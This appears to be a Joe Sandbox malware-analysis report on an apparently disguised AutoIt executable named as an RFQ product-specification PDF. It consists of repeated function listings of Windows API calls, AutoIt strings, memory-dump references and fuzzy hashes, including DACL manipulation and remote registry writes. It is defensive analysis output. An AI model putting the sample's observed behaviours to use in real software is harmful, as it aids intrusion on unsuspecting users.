                                                                                                                  • Part of subcall function 00AD73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AD7471
                                                                                                                  • Part of subcall function 00AD73E8: SelectObject.GDI32(?,00000000), ref: 00AD7482
                                                                                                                  • Part of subcall function 00AD73E8: SetBkColor.GDI32(?,00000000), ref: 00AD748B
                                                                                                                  • Part of subcall function 00AD73E8: SelectObject.GDI32(?,?), ref: 00AD7498
                                                                                                                  • Part of subcall function 00AD73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00AD74B7
                                                                                                                  • Part of subcall function 00AD73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AD74CE
                                                                                                                  • Part of subcall function 00AD73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00AD74DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 4124339563-0
                                                                                                                • Opcode ID: 7aff75f14cd36c7f979ea634e3311afd376adb326a2ae770284127e45a623e24
                                                                                                                • Instruction ID: 31c396efa43d7c1a58e1a6531b8a8b8650a4f1a85a70233188d44b48a10c9c8b
                                                                                                                • Opcode Fuzzy Hash: 7aff75f14cd36c7f979ea634e3311afd376adb326a2ae770284127e45a623e24
                                                                                                                • Instruction Fuzzy Hash: 87A18E72009312AFDB04DFA0DC48A6EBBA9FB49331F500B1AF963961E1E771E945CB51
                                                                                                                Function 00AC2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 00AC273E
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AC286A
                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00AC28A9
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00AC28B9
                                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00AC2900
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00AC290C
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00AC2955
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AC2964
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00AC2974
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00AC2978
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00AC2988
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AC2991
                                                                                                                • DeleteDC.GDI32(00000000), ref: 00AC299A
                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AC29C6
                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AC29DD
                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00AC2A1D
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AC2A31
                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AC2A42
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00AC2A77
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00AC2A82
                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AC2A8D
                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00AC2A97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                • Opcode ID: d1635dcb0b950b56481cd47c789b2e6302668bfb5e3031b32248a4b00683c2a6
                                                                                                                • Instruction ID: 71d3c45ca3d31da6f09b3de6512683a6cc5c3a4c9d7698904b2055e14dfa19ed
                                                                                                                • Opcode Fuzzy Hash: d1635dcb0b950b56481cd47c789b2e6302668bfb5e3031b32248a4b00683c2a6
                                                                                                                • Instruction Fuzzy Hash: 75B16D75A00215AFEB10DFA8DD85FAE7BB9EB44710F408519FA15E7290DB70ED00CB64
                                                                                                                Function 00AB4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00AB4AED
                                                                                                                • GetDriveTypeW.KERNEL32(?,00ADCB68,?,\\.\,00ADCC08), ref: 00AB4BCA
                                                                                                                • SetErrorMode.KERNEL32(00000000,00ADCB68,?,\\.\,00ADCC08), ref: 00AB4D36
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                • Opcode ID: 2ec410fb8a5766f41114d657b2ed55c7e30941a601d337a9e2feca19856fc21d
                                                                                                                • Instruction ID: 0628170e5e30959aedae3f73260eda1007e98bd49ccf3a3cc510fdf8b51567d1
                                                                                                                • Opcode Fuzzy Hash: 2ec410fb8a5766f41114d657b2ed55c7e30941a601d337a9e2feca19856fc21d
                                                                                                                • Instruction Fuzzy Hash: 9D61B1306051069BCB14DF24CA829FD7FF8EB4EB04B208565F806AB6A3DB31ED55EB41
                                                                                                                Function 00AD73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000012), ref: 00AD7421
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00AD7425
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00AD743B
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00AD7446
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00AD744B
                                                                                                                • GetSysColor.USER32(00000011), ref: 00AD7463
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AD7471
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00AD7482
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00AD748B
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AD7498
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00AD74B7
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AD74CE
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00AD74DB
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AD752A
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AD7554
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00AD7572
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00AD757D
                                                                                                                • GetSysColor.USER32(00000011), ref: 00AD758E
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00AD7596
                                                                                                                • DrawTextW.USER32(?,00AD70F5,000000FF,?,00000000), ref: 00AD75A8
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AD75BF
                                                                                                                • DeleteObject.GDI32(?), ref: 00AD75CA
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AD75D0
                                                                                                                • DeleteObject.GDI32(?), ref: 00AD75D5
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00AD75DB
                                                                                                                • SetBkColor.GDI32(?,?), ref: 00AD75E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1996641542-0
                                                                                                                • Opcode ID: 477f27aec34c05c252a80ad0aa63d3887cf1026d8ce78e6c5de82b8a652e252b
                                                                                                                • Instruction ID: e218c231e912a854db926cad7681f52eb19b23ec364e9647e20eff3d70330970
                                                                                                                • Opcode Fuzzy Hash: 477f27aec34c05c252a80ad0aa63d3887cf1026d8ce78e6c5de82b8a652e252b
                                                                                                                • Instruction Fuzzy Hash: 7C615072901219AFDF05DFA4DC49EEEBF79FB08320F114216F916AB2A1E7749941CB90
                                                                                                                Function 00AD0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD1128
                                                                                                                • GetDesktopWindow.USER32 ref: 00AD113D
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AD1144
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD1199
                                                                                                                • DestroyWindow.USER32(?), ref: 00AD11B9
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AD11ED
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AD120B
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AD121D
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 00AD1232
                                                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AD1245
                                                                                                                • IsWindowVisible.USER32(00000000), ref: 00AD12A1
                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AD12BC
                                                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AD12D0
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AD12E8
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00AD130E
                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00AD1328
                                                                                                                • CopyRect.USER32(?,?), ref: 00AD133F
                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 00AD13AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                • Opcode ID: 9441cc93359fea2d79786d0fda1c16e8bef52450fc29851078c810fb2f94fb63
                                                                                                                • Instruction ID: cbbbaadd70d06a1bea0883fee1ef262cd665400ac23ff03b411612c455cfd20b
                                                                                                                • Opcode Fuzzy Hash: 9441cc93359fea2d79786d0fda1c16e8bef52450fc29851078c810fb2f94fb63
                                                                                                                • Instruction Fuzzy Hash: 17B17B71608341AFD704DF64C984B6BBBE4FF84350F40891EF99A9B2A1C731E845CBA2
                                                                                                                Function 00AD0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AD02E5
                                                                                                                • _wcslen.LIBCMT ref: 00AD031F
                                                                                                                • _wcslen.LIBCMT ref: 00AD0389
                                                                                                                • _wcslen.LIBCMT ref: 00AD03F1
                                                                                                                • _wcslen.LIBCMT ref: 00AD0475
                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AD04C5
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AD0504
                                                                                                                  • Part of subcall function 00A5F9F2: _wcslen.LIBCMT ref: 00A5F9FD
                                                                                                                  • Part of subcall function 00AA223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AA2258
                                                                                                                  • Part of subcall function 00AA223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AA228A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                • API String ID: 1103490817-719923060
                                                                                                                • Opcode ID: 45083dff191a6605b79ceb3b4911080ba38d33e6229788e09cc7cb128a8e3811
                                                                                                                • Instruction ID: 3a08c816d0a66f635e56d3989608f79cf969e65ab3f4d322dab261716c4ed9d1
                                                                                                                • Opcode Fuzzy Hash: 45083dff191a6605b79ceb3b4911080ba38d33e6229788e09cc7cb128a8e3811
                                                                                                                • Instruction Fuzzy Hash: 57E16A316082019BC714DF28CA51E2AB7E6BFD8714F14496EF8979B3A1DB30ED45CB92
                                                                                                                Function 00A58891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A58968
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00A58970
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A5899B
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00A589A3
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00A589C8
                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A589E5
                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A589F5
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A58A28
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A58A3C
                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00A58A5A
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00A58A76
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A58A81
                                                                                                                  • Part of subcall function 00A5912D: GetCursorPos.USER32(?), ref: 00A59141
                                                                                                                  • Part of subcall function 00A5912D: ScreenToClient.USER32(00000000,?), ref: 00A5915E
                                                                                                                  • Part of subcall function 00A5912D: GetAsyncKeyState.USER32(00000001), ref: 00A59183
                                                                                                                  • Part of subcall function 00A5912D: GetAsyncKeyState.USER32(00000002), ref: 00A5919D
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00A590FC), ref: 00A58AA8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                • Opcode ID: 6e0478b7f28725b47cdc4411e0f932f220057813bcfaf0746b36708429f5c2cc
                                                                                                                • Instruction ID: d9bd950d6d30e3f60a41a45dd0edace2af72281254d22282841f4315c783cf6a
                                                                                                                • Opcode Fuzzy Hash: 6e0478b7f28725b47cdc4411e0f932f220057813bcfaf0746b36708429f5c2cc
                                                                                                                • Instruction Fuzzy Hash: 36B15C31A0120ADFDF14DFA8DD45BEE3BB5FB48365F50861AFA16A7290DB34A841CB50
                                                                                                                Function 00AA0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AA1114
                                                                                                                  • Part of subcall function 00AA10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1120
                                                                                                                  • Part of subcall function 00AA10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA112F
                                                                                                                  • Part of subcall function 00AA10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1136
                                                                                                                  • Part of subcall function 00AA10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AA114D
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AA0DF5
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AA0E29
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00AA0E40
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00AA0E7A
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AA0E96
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00AA0EAD
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AA0EB5
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00AA0EBC
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AA0EDD
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00AA0EE4
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AA0F13
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AA0F35
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AA0F47
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0F6E
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0F75
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0F7E
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0F85
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0F8E
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0F95
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00AA0FA1
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0FA8
                                                                                                                  • Part of subcall function 00AA1193: GetProcessHeap.KERNEL32(00000008,00AA0BB1,?,00000000,?,00AA0BB1,?), ref: 00AA11A1
                                                                                                                  • Part of subcall function 00AA1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AA0BB1,?), ref: 00AA11A8
                                                                                                                  • Part of subcall function 00AA1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AA0BB1,?), ref: 00AA11B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 4175595110-0
                                                                                                                • Opcode ID: f6a4f29b934746d8439d51750bbee147db522ddebf12a02767e540bcae25ef2f
                                                                                                                • Instruction ID: 9302367438467b2fc13c577fb7804e3edf200d333eacfd3533b59425be6ed7db
                                                                                                                • Opcode Fuzzy Hash: f6a4f29b934746d8439d51750bbee147db522ddebf12a02767e540bcae25ef2f
                                                                                                                • Instruction Fuzzy Hash: 45713A7290121AEFDF20DFA4DD44FAEBBB8AF05311F14421AF919E7191D771A905CB60
                                                                                                                Function 00ACC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ACC4BD
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ADCC08,00000000,?,00000000,?,?), ref: 00ACC544
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00ACC5A4
                                                                                                                • _wcslen.LIBCMT ref: 00ACC5F4
                                                                                                                • _wcslen.LIBCMT ref: 00ACC66F
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00ACC6B2
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00ACC7C1
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00ACC84D
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00ACC881
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00ACC88E
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00ACC960
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
